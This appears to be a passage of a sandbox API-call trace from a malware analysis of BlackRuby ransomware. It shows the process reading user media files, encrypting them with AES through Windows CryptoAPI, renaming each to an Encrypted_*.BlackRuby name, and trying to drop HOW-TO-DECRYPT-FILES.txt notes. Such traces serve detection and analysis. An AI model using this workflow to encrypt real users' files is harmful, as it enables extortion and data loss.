GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PESHA2VEOWtmbkq.png", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PESHA2VEOWtmbkq.png", lpFilePart=0x0) returned 0x34 [0051.076] GetLastError () returned 0x5 [0051.076] SetErrorMode (uMode=0x1) returned 0x0 [0051.076] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PESHA2VEOWtmbkq.png" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\pesha2veowtmbkq.png"), fInfoLevelId=0x0, lpFileInformation=0x1b60980 | out: lpFileInformation=0x1b60980*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1b8d9050, ftCreationTime.dwHighDateTime=0x1d34a39, ftLastAccessTime.dwLowDateTime=0x31483ce0, ftLastAccessTime.dwHighDateTime=0x1d34a3b, ftLastWriteTime.dwLowDateTime=0x31483ce0, ftLastWriteTime.dwHighDateTime=0x1d34a3b, nFileSizeHigh=0x0, nFileSizeLow=0x5340)) returned 1 [0051.076] GetLastError () returned 0x5 [0051.076] SetErrorMode (uMode=0x0) returned 0x1 [0051.076] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PESHA2VEOWtmbkq.png", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PESHA2VEOWtmbkq.png", lpFilePart=0x0) returned 0x34 [0051.076] GetLastError () returned 0x5 [0051.076] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PESHA2VEOWtmbkq.png", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PESHA2VEOWtmbkq.png", lpFilePart=0x0) returned 0x34 [0051.076] GetLastError () returned 0x5 [0051.076] SetErrorMode (uMode=0x1) returned 0x0 [0051.076] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PESHA2VEOWtmbkq.png" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\pesha2veowtmbkq.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.076] GetLastError () returned 0x0 [0051.076] GetFileType (hFile=0x184) returned 0x1 [0051.076] SetErrorMode (uMode=0x0) returned 0x1 [0051.076] GetFileType (hFile=0x184) returned 0x1 [0051.076] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x5340 [0051.076] GetLastError () returned 0x0 [0051.076] ReadFile (in: hFile=0x184, lpBuffer=0x1b62858, nNumberOfBytesToRead=0x5340, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1b62858*, lpNumberOfBytesRead=0x18ed18*=0x5340, lpOverlapped=0x0) returned 1 [0051.077] GetLastError () returned 0x0 [0051.077] CloseHandle (hObject=0x184) returned 1 [0051.077] GetLastError () returned 0x0 [0051.077] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PESHA2VEOWtmbkq.png", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PESHA2VEOWtmbkq.png", lpFilePart=0x0) returned 0x34 [0051.077] GetLastError () returned 0x0 [0051.077] SetErrorMode (uMode=0x1) returned 0x0 [0051.077] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PESHA2VEOWtmbkq.png" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\pesha2veowtmbkq.png"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1b8d9050, ftCreationTime.dwHighDateTime=0x1d34a39, ftLastAccessTime.dwLowDateTime=0x31483ce0, ftLastAccessTime.dwHighDateTime=0x1d34a3b, ftLastWriteTime.dwLowDateTime=0x31483ce0, ftLastWriteTime.dwHighDateTime=0x1d34a3b, nFileSizeHigh=0x0, nFileSizeLow=0x5340)) returned 1 [0051.078] GetLastError () returned 0x0 [0051.078] SetErrorMode (uMode=0x0) returned 0x1 [0051.078] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c4e8) returned 1 [0051.078] GetLastError () returned 0x0 [0051.111] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1bc72a4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360ee0) returned 1 [0051.111] GetLastError () returned 0x0 [0051.111] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.111] GetLastError () returned 0x0 [0051.116] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.116] GetLastError () returned 0x0 [0051.116] CryptDuplicateKey (in: hKey=0x360ee0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360da0) returned 1 [0051.116] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.116] GetLastError () returned 0x0 [0051.116] CryptSetKeyParam (hKey=0x360da0, dwParam=0x4, pbData=0x1bf42f0*=0x1, dwFlags=0x0) returned 1 [0051.116] GetLastError () returned 0x0 [0051.116] CryptSetKeyParam (hKey=0x360da0, dwParam=0x1, pbData=0x1bf42bc, dwFlags=0x0) returned 1 [0051.116] GetLastError () returned 0x0 [0051.116] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bf4338*, pdwDataLen=0x18ed08*=0x5440, dwBufLen=0x5440 | out: pbData=0x1bf4338*, pdwDataLen=0x18ed08*=0x5440) returned 1 [0051.116] GetLastError () returned 0x0 [0051.116] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bfebe4*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1bfebe4*, pdwDataLen=0x18ed20*=0x10) returned 1 [0051.116] GetLastError () returned 0x0 [0051.116] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bfec14*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1bfec14*, pdwDataLen=0x18ed28*=0x10) returned 1 [0051.116] GetLastError () returned 0x0 [0051.116] CryptDestroyKey (hKey=0x360ee0) returned 1 [0051.116] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0051.116] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0051.116] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PESHA2VEOWtmbkq.png", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PESHA2VEOWtmbkq.png", lpFilePart=0x0) returned 0x34 [0051.116] GetLastError () returned 0x0 [0051.116] SetErrorMode (uMode=0x1) returned 0x0 [0051.116] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PESHA2VEOWtmbkq.png" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\pesha2veowtmbkq.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.117] GetLastError () returned 0xb7 [0051.117] GetFileType (hFile=0x184) returned 0x1 [0051.117] SetErrorMode (uMode=0x0) returned 0x1 [0051.117] GetFileType (hFile=0x184) returned 0x1 [0051.119] CloseHandle (hObject=0x184) returned 1 [0051.119] GetLastError () returned 0xb7 [0051.119] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PESHA2VEOWtmbkq.png", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PESHA2VEOWtmbkq.png", lpFilePart=0x0) returned 0x34 [0051.119] GetLastError () returned 0xb7 [0051.119] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_Nhf3914HtuJgMS12NfxqbPmH9LhapBjEHRw1eT8WN.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_Nhf3914HtuJgMS12NfxqbPmH9LhapBjEHRw1eT8WN.BlackRuby", lpFilePart=0x0) returned 0x5e [0051.119] GetLastError () returned 0xb7 [0051.119] SetErrorMode (uMode=0x1) returned 0x0 [0051.119] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PESHA2VEOWtmbkq.png" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\pesha2veowtmbkq.png"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1b8d9050, ftCreationTime.dwHighDateTime=0x1d34a39, ftLastAccessTime.dwLowDateTime=0x31483ce0, ftLastAccessTime.dwHighDateTime=0x1d34a3b, ftLastWriteTime.dwLowDateTime=0x26abab40, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x5450)) returned 1 [0051.119] GetLastError () returned 0xb7 [0051.119] SetErrorMode (uMode=0x0) returned 0x1 [0051.119] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PESHA2VEOWtmbkq.png" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\pesha2veowtmbkq.png"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_Nhf3914HtuJgMS12NfxqbPmH9LhapBjEHRw1eT8WN.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_nhf3914htujgms12nfxqbpmh9lhapbjehrw1et8wn.blackruby")) returned 1 [0051.120] GetLastError () returned 0xb7 [0051.120] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0051.120] GetLastError () returned 0xb7 [0051.120] SetErrorMode (uMode=0x1) returned 0x0 [0051.120] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0051.120] GetLastError () returned 0x5 [0051.121] SetErrorMode (uMode=0x0) returned 0x1 [0051.121] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PIxd7XbPmZeYov.flv", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PIxd7XbPmZeYov.flv", lpFilePart=0x0) returned 0x33 [0051.121] GetLastError () returned 0x5 [0051.121] SetErrorMode (uMode=0x1) returned 0x0 [0051.121] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PIxd7XbPmZeYov.flv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\pixd7xbpmzeyov.flv"), fInfoLevelId=0x0, lpFileInformation=0x1c2bbf0 | out: lpFileInformation=0x1c2bbf0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3fdf8110, ftCreationTime.dwHighDateTime=0x1d34b52, ftLastAccessTime.dwLowDateTime=0x53e72ce0, ftLastAccessTime.dwHighDateTime=0x1d356cd, ftLastWriteTime.dwLowDateTime=0x53e72ce0, ftLastWriteTime.dwHighDateTime=0x1d356cd, nFileSizeHigh=0x0, nFileSizeLow=0x12ce4)) returned 1 [0051.121] GetLastError () returned 0x5 [0051.121] SetErrorMode (uMode=0x0) returned 0x1 [0051.121] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PIxd7XbPmZeYov.flv", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PIxd7XbPmZeYov.flv", lpFilePart=0x0) returned 0x33 [0051.121] GetLastError () returned 0x5 [0051.121] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PIxd7XbPmZeYov.flv", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PIxd7XbPmZeYov.flv", lpFilePart=0x0) returned 0x33 [0051.121] GetLastError () returned 0x5 [0051.121] SetErrorMode (uMode=0x1) returned 0x0 [0051.121] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PIxd7XbPmZeYov.flv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\pixd7xbpmzeyov.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.121] GetLastError () returned 0x0 [0051.121] GetFileType (hFile=0x184) returned 0x1 [0051.121] SetErrorMode (uMode=0x0) returned 0x1 [0051.121] GetFileType (hFile=0x184) returned 0x1 [0051.121] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x12ce4 [0051.121] GetLastError () returned 0x0 [0051.122] ReadFile (in: hFile=0x184, lpBuffer=0x1c2d6c8, nNumberOfBytesToRead=0x12ce4, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1c2d6c8*, lpNumberOfBytesRead=0x18ed18*=0x12ce4, lpOverlapped=0x0) returned 1 [0051.122] GetLastError () returned 0x0 [0051.122] CloseHandle (hObject=0x184) returned 1 [0051.122] GetLastError () returned 0x0 [0051.122] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PIxd7XbPmZeYov.flv", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PIxd7XbPmZeYov.flv", lpFilePart=0x0) returned 0x33 [0051.123] GetLastError () returned 0x0 [0051.123] SetErrorMode (uMode=0x1) returned 0x0 [0051.123] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PIxd7XbPmZeYov.flv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\pixd7xbpmzeyov.flv"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3fdf8110, ftCreationTime.dwHighDateTime=0x1d34b52, ftLastAccessTime.dwLowDateTime=0x53e72ce0, ftLastAccessTime.dwHighDateTime=0x1d356cd, ftLastWriteTime.dwLowDateTime=0x53e72ce0, ftLastWriteTime.dwHighDateTime=0x1d356cd, nFileSizeHigh=0x0, nFileSizeLow=0x12ce4)) returned 1 [0051.123] GetLastError () returned 0x0 [0051.123] SetErrorMode (uMode=0x0) returned 0x1 [0051.134] CryptImportKey (in: hProv=0x37c790, pbData=0x1cad454, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360ea0) returned 1 [0051.134] GetLastError () returned 0x0 [0051.134] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.134] GetLastError () returned 0x0 [0051.139] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.139] GetLastError () returned 0x0 [0051.139] CryptDuplicateKey (in: hKey=0x360ea0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360de0) returned 1 [0051.139] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.139] GetLastError () returned 0x0 [0051.139] CryptSetKeyParam (hKey=0x360de0, dwParam=0x4, pbData=0x1cda4a0*=0x1, dwFlags=0x0) returned 1 [0051.139] GetLastError () returned 0x0 [0051.139] CryptSetKeyParam (hKey=0x360de0, dwParam=0x1, pbData=0x1cda46c, dwFlags=0x0) returned 1 [0051.139] GetLastError () returned 0x0 [0051.139] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cda4e8*, pdwDataLen=0x18ed08*=0x12de0, dwBufLen=0x12de0 | out: pbData=0x1cda4e8*, pdwDataLen=0x18ed08*=0x12de0) returned 1 [0051.140] GetLastError () returned 0x0 [0051.140] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d000d4*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1d000d4*, pdwDataLen=0x18ed20*=0x10) returned 1 [0051.140] GetLastError () returned 0x0 [0051.140] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d00104*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1d00104*, pdwDataLen=0x18ed28*=0x10) returned 1 [0051.140] GetLastError () returned 0x0 [0051.141] CryptDestroyKey (hKey=0x360ea0) returned 1 [0051.141] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0051.141] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0051.141] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PIxd7XbPmZeYov.flv", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PIxd7XbPmZeYov.flv", lpFilePart=0x0) returned 0x33 [0051.141] GetLastError () returned 0x0 [0051.141] SetErrorMode (uMode=0x1) returned 0x0 [0051.142] GetFileType (hFile=0x184) returned 0x1 [0051.142] GetFileType (hFile=0x184) returned 0x1 [0051.144] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\PIxd7XbPmZeYov.flv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\pixd7xbpmzeyov.flv"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_AYhGD5d7EX1zoLMmWw069LCsMlpZgX79Sqyw.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_ayhgd5d7ex1zolmmww069lcsmlpzgx79sqyw.blackruby")) returned 1 [0051.145] GetLastError () returned 0xb7 [0051.145] SetErrorMode (uMode=0x0) returned 0x1 [0051.146] GetFileType (hFile=0x184) returned 0x1 [0051.146] GetFileType (hFile=0x184) returned 0x1 [0051.146] ReadFile (in: hFile=0x184, lpBuffer=0x1d31d9c, nNumberOfBytesToRead=0xb98b, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1d31d9c*, lpNumberOfBytesRead=0x18ed18*=0xb98b, lpOverlapped=0x0) returned 1 [0051.147] GetLastError () returned 0x0 [0051.162] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c790) returned 1 [0051.162] GetLastError () returned 0x0 [0051.196] CryptImportKey (in: hProv=0x37c790, pbData=0x1b89928, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360de0) returned 1 [0051.196] GetLastError () returned 0x0 [0051.196] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.196] GetLastError () returned 0x0 [0051.201] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.201] GetLastError () returned 0x0 [0051.201] CryptDuplicateKey (in: hKey=0x360de0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360b60) returned 1 [0051.201] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.201] GetLastError () returned 0x0 [0051.202] CryptSetKeyParam (hKey=0x360b60, dwParam=0x4, pbData=0x1bb6974*=0x1, dwFlags=0x0) returned 1 [0051.202] GetLastError () returned 0x0 [0051.202] CryptSetKeyParam (hKey=0x360b60, dwParam=0x1, pbData=0x1bb6940, dwFlags=0x0) returned 1 [0051.202] GetLastError () returned 0x0 [0051.202] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bb69bc*, pdwDataLen=0x18ed08*=0xba80, dwBufLen=0xba80 | out: pbData=0x1bb69bc*, pdwDataLen=0x18ed08*=0xba80) returned 1 [0051.207] GetLastError () returned 0x0 [0051.207] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bcdee8*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1bcdee8*, pdwDataLen=0x18ed20*=0x10) returned 1 [0051.207] GetLastError () returned 0x0 [0051.207] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bcdf18*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1bcdf18*, pdwDataLen=0x18ed28*=0x10) returned 1 [0051.207] GetLastError () returned 0x0 [0051.208] CryptDestroyKey (hKey=0x360de0) returned 1 [0051.208] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0051.208] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0051.208] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Q2Ci-LnJuLydG5q.mp4", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Q2Ci-LnJuLydG5q.mp4", lpFilePart=0x0) returned 0x34 [0051.208] GetLastError () returned 0x0 [0051.208] SetErrorMode (uMode=0x1) returned 0x0 [0051.208] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Q2Ci-LnJuLydG5q.mp4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\q2ci-lnjulydg5q.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.209] GetLastError () returned 0xb7 [0051.209] GetFileType (hFile=0x184) returned 0x1 [0051.209] SetErrorMode (uMode=0x0) returned 0x1 [0051.210] GetFileType (hFile=0x184) returned 0x1 [0051.212] CloseHandle (hObject=0x184) returned 1 [0051.212] GetLastError () returned 0xb7 [0051.212] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Q2Ci-LnJuLydG5q.mp4", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Q2Ci-LnJuLydG5q.mp4", lpFilePart=0x0) returned 0x34 [0051.212] GetLastError () returned 0xb7 [0051.212] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_GDKGJxBvfNDIw4iojm0Dja3vIP39eyHbEfJcop.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_GDKGJxBvfNDIw4iojm0Dja3vIP39eyHbEfJcop.BlackRuby", lpFilePart=0x0) returned 0x5b [0051.212] GetLastError () returned 0xb7 [0051.212] SetErrorMode (uMode=0x1) returned 0x0 [0051.212] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Q2Ci-LnJuLydG5q.mp4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\q2ci-lnjulydg5q.mp4"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdd1babb0, ftCreationTime.dwHighDateTime=0x1d351f2, ftLastAccessTime.dwLowDateTime=0x27262120, ftLastAccessTime.dwHighDateTime=0x1d34c19, ftLastWriteTime.dwLowDateTime=0x26b9f380, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xba90)) returned 1 [0051.212] GetLastError () returned 0xb7 [0051.212] SetErrorMode (uMode=0x0) returned 0x1 [0051.212] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Q2Ci-LnJuLydG5q.mp4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\q2ci-lnjulydg5q.mp4"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_GDKGJxBvfNDIw4iojm0Dja3vIP39eyHbEfJcop.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_gdkgjxbvfndiw4iojm0dja3vip39eyhbefjcop.blackruby")) returned 1 [0051.213] GetLastError () returned 0xb7 [0051.213] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0051.213] GetLastError () returned 0xb7 [0051.213] SetErrorMode (uMode=0x1) returned 0x0 [0051.213] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0051.213] GetLastError () returned 0x5 [0051.214] SetErrorMode (uMode=0x0) returned 0x1 [0051.214] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\q9N-aMnqLEo-9.jpg", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\q9N-aMnqLEo-9.jpg", lpFilePart=0x0) returned 0x32 [0051.214] GetLastError () returned 0x5 [0051.214] SetErrorMode (uMode=0x1) returned 0x0 [0051.214] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\q9N-aMnqLEo-9.jpg" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\q9n-amnqleo-9.jpg"), fInfoLevelId=0x0, lpFileInformation=0x1bf6c98 | out: lpFileInformation=0x1bf6c98*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4f1c64b0, ftCreationTime.dwHighDateTime=0x1d35528, ftLastAccessTime.dwLowDateTime=0xa1811870, ftLastAccessTime.dwHighDateTime=0x1d34dc3, ftLastWriteTime.dwLowDateTime=0xa1811870, ftLastWriteTime.dwHighDateTime=0x1d34dc3, nFileSizeHigh=0x0, nFileSizeLow=0x13c6b)) returned 1 [0051.214] GetLastError () returned 0x5 [0051.214] SetErrorMode (uMode=0x0) returned 0x1 [0051.215] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\q9N-aMnqLEo-9.jpg", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\q9N-aMnqLEo-9.jpg", lpFilePart=0x0) returned 0x32 [0051.215] GetLastError () returned 0x5 [0051.215] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\q9N-aMnqLEo-9.jpg", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\q9N-aMnqLEo-9.jpg", lpFilePart=0x0) returned 0x32 [0051.215] GetLastError () returned 0x5 [0051.215] SetErrorMode 